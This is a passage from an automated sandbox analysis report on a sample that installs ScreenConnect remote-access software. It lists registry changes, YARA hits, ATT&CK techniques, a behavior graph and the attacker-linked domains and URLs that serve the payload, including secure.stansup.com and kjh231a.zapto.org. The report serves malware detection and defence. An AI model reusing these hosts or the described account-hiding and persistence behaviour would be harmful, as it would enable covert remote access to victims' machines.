                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exe VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Client.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Core.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.Windows.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeQueries volume information: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.ClientService.dll VolumeInformation
                  Source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..tion_25b0fbb6ef7eb094_0018.0002_f3cfe998554fce42\ScreenConnect.WindowsClient.exeCode function: 12_2_00007FF848E53632 CreateNamedPipeW,12_2_00007FF848E53632
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeCode function: 0_2_00AC1806 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00AC1806
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Amcache.hve.5.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                  Source: Amcache.hve.5.drBinary or memory string: MsMpEng.exe
                  Source: C:\Users\user\Desktop\3coxOaV92n.exeRegistry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\7B0F360B775F76C94A12CA48445AA2D2A875701C BlobJump to behavior
                  Source: Yara matchFile source: 9.0.ScreenConnect.WindowsClient.exe.c10000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000000.2403366409.0000000000C12000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000002.2909498559.000002A1002EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.2421960225.0000000002EBF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: dfsvc.exe PID: 3056, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 1816, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: ScreenConnect.ClientService.exe PID: 5244, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire Infrastructure1
                  Valid Accounts                  		31
                  Windows Management Instrumentation                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		21
                  Disable or Modify Tools                  		OS Credential Dumping1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts11
                  Native API                  		1
                  DLL Search Order Hijacking                  		1
                  DLL Search Order Hijacking                  		1
                  Obfuscated Files or Information                  		LSASS Memory2
                  File and Directory Discovery                  		Remote Desktop ProtocolData from Removable Media21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts12
                  Command and Scripting Interpreter                  		1
                  Valid Accounts                  		1
                  Valid Accounts                  		1
                  Install Root Certificate                  		Security Account Manager65
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts1
                  Scheduled Task/Job                  		2
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  Timestomp                  		NTDS71
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchd1
                  Scheduled Task/Job                  		2
                  Windows Service                  		1
                  DLL Side-Loading                  		LSA Secrets2
                  Process Discovery                  		SSHKeylogging3
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                  Bootkit                  		13
                  Process Injection                  		1
                  DLL Search Order Hijacking                  		Cached Domain Credentials71
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                  Scheduled Task/Job                  		111
                  Masquerading                  		DCSync1
                  Application Window Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                  Valid Accounts                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Modify Registry                  		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                  Access Token Manipulation                  		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd71
                  Virtualization/Sandbox Evasion                  		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                  Process Injection                  		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                  Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                  Hidden Users                  		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                  Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                  Bootkit                  		Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1542318 Sample: 3coxOaV92n.exe Startdate: 25/10/2024 Architecture: WINDOWS Score: 60 50 secure.stansup.com 2->50 52 kjh231a.zapto.org 2->52 54 5 other IPs or domains 2->54 60 Multi AV Scanner detection for submitted file 2->60 62 .NET source code references suspicious native API functions 2->62 64 Detected potential unwanted application 2->64 66 2 other signatures 2->66 9 ScreenConnect.ClientService.exe 2->9         started        12 3coxOaV92n.exe 2 2->12         started        14 svchost.exe 8 2->14         started        16 2 other processes 2->16 signatures3 process4 dnsIp5 76 Reads the Security eventlog 9->76 78 Reads the System eventlog 9->78 19 ScreenConnect.WindowsClient.exe 9->19         started        22 ScreenConnect.WindowsClient.exe 9->22         started        24 dfsvc.exe 128 109 12->24         started        28 WerFault.exe 19 16 12->28         started        30 WerFault.exe 2 14->30         started        48 127.0.0.1 unknown unknown 16->48 signatures6 process7 dnsIp8 68 Creates files in the system32 config directory 19->68 70 Contains functionality to hide user accounts 19->70 56 kjh231a.zapto.org 79.110.49.185, 443, 49705, 49711 OTAVANET-ASCZ Germany 24->56 38 C:\...\ScreenConnect.WindowsFileManager.exe, PE32 24->38 dropped 40 C:\Users\...\ScreenConnect.WindowsClient.exe, PE32 24->40 dropped 42 ScreenConnect.WindowsBackstageShell.exe, PE32 24->42 dropped 46 13 other files (none is malicious) 24->46 dropped 32 ScreenConnect.WindowsClient.exe 19 10 24->32         started        44 C:\ProgramData\Microsoft\...\Report.wer, Unicode 28->44 dropped file9 signatures10 process11 signatures12 58 Contains functionality to hide user accounts 32->58 35 ScreenConnect.ClientService.exe 32->35         started        process13 signatures14 72 Contains functionality to hide user accounts 35->72 74 Enables network access during safeboot for specific services 35->74

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  3coxOaV92n.exe24%ReversingLabsWin32.Trojan.Generic

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre...exe_25b0fbb6ef7eb094_0018.0002_none_985bc5604181410b\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..core_4b14c015c87c1ad8_0018.0002_none_53c526ebfd4c427f\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..dows_4b14c015c87c1ad8_0018.0002_none_583cfecd399a55af\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_b50c000fe630258c\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..ient_4b14c015c87c1ad8_0018.0002_none_e9da84be0c9b9883\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Apps\2.0\NP1Y8XRR.MXL\JZ9QEWOK.6WB\scre..vice_4b14c015c87c1ad8_0018.0002_none_0518bf34930ba5ea\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Client.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.ClientService.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Core.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.Windows.dll0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsClient.exe0%ReversingLabs
                  C:\Users\user\AppData\Local\Temp\Deployment\22ZD2V4C.0O4\NY35KDR3.BNV\ScreenConnect.WindowsFileManager.exe0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://g.live.com/odclientsettings/ProdV2.C:0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  http://www.w3.or0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue0%URL Reputationsafe
                  http://schemas.xmlsoap.org/soap/envelope/0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/02/trust0%URL Reputationsafe
                  http://www.w3.o0%URL Reputationsafe
                  http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/09/policy0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  bg.microsoft.map.fastly.net
                  		199.232.210.172
                  		truefalse
                    		unknown
                    secure.stansup.com
                    		79.110.49.185
                    		truefalse
                      		unknown
                      kjh231a.zapto.org
                      		79.110.49.185
                      		truefalse
                        		unknown
                        default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
                        		84.201.210.18
                        		truefalse
                          		unknown
                          fp2e7a.wpc.phicdn.net
                          		192.229.221.95
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exefalse
                              		unknown
                              https://secure.stansup.com/Bin/ScreenConnect.WindowsBackstageShell.exe.configfalse
                                		unknown
                                https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe.configfalse
                                  		unknown
                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configfalse
                                    		unknown
                                    https://secure.stansup.com/Bin/ScreenConnect.ClientService.exefalse
                                      		unknown
                                      https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exefalse
                                        		unknown
                                        https://secure.stansup.com/Bin/ScreenConnect.ClientService.dllfalse
                                          		unknown
                                          https://secure.stansup.com/Bin/ScreenConnect.Client.dllfalse
                                            		unknown
                                            https://secure.stansup.com/Bin/ScreenConnect.Windows.dllfalse
                                              		unknown
                                              https://secure.stansup.com/Bin/ScreenConnect.Client.manifestfalse
                                                		unknown
                                                https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exefalse
                                                  		unknown
                                                  https://secure.stansup.com/Bin/ScreenConnect.Core.dllfalse
                                                    		unknown

                                                    URLs from Memory and Binaries

                                                    NameSourceMaliciousAntivirus DetectionReputation
                                                    http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd2001svchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      https://secure.stansup.com/Bin/ScreenConnect.Client.application#ScreenConnecdfsvc.exe, 00000001.00000002.2923392693.000002A175AEF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        https://secure.stansup.com/Bin/ScreenConnect.Client.application?ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdngsvchost.exe, 00000007.00000003.2091573425.000002487B552000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.applicationftdfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              https://secure.stansup.com/Bin/ScreenConnect.Client.application9dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000009.00000002.2421353352.0000000001229000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown
                                                                https://secure.stansup.com/Bin/ScreenConnect.Client.applicationHdfsvc.exe, 00000001.00000002.2923145386.000002A175AA9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		unknown
                                                                  https://secure.stansup.com/Bin/ScreenConnect.WindowsFileManager.exe.configndfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		unknown
                                                                    https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exeCdfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		unknown
                                                                      https://g.live.com/odclientsettings/ProdV2.C:svchost.exe, 00000006.00000003.2055900652.00000246CF5B0000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drfalse
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      https://secure.staPBdfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		unknown
                                                                        https://login.microsoftonline.com/ppsecure/ResolveUser.srfsvchost.exe, 00000007.00000003.2063530764.000002487B54D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000003.2063610027.000002487B563000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		unknown
                                                                          https://secure.stansup.comdfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100268000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A1003C1000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A10073A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.2909498559.000002A100694000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		unknown
                                                                            https://secure.stansup.com/Bin/ScreenConnect.Client.application1dfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              https://secure.stansup.com/Bin/ScreenConnect.WindowsClient.exe8dfsvc.exe, 00000001.00000002.2909498559.000002A100628000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		unknown
                                                                                http://Passport.NET/STS</ds:KeyName></ds:KeyInfo><Ciphsvchost.exe, 00000007.00000002.3285828510.000002487BC3C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		unknown
                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issuesvchost.exe, 00000007.00000002.3285628178.000002487B55F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://account.live.svchost.exe, 00000007.00000002.3284765643.000002487AC3F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		unknown
                                                                                    https://secure.stansup.com/Bin/ScreenConnect.Client.applicationhdfsvc.exe, 00000001.00000002.2923701714.000002A175BE0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      		unknown
                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAAsvchost.exe, 00000007.00000003.2186587664.000002487B529000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		unknown
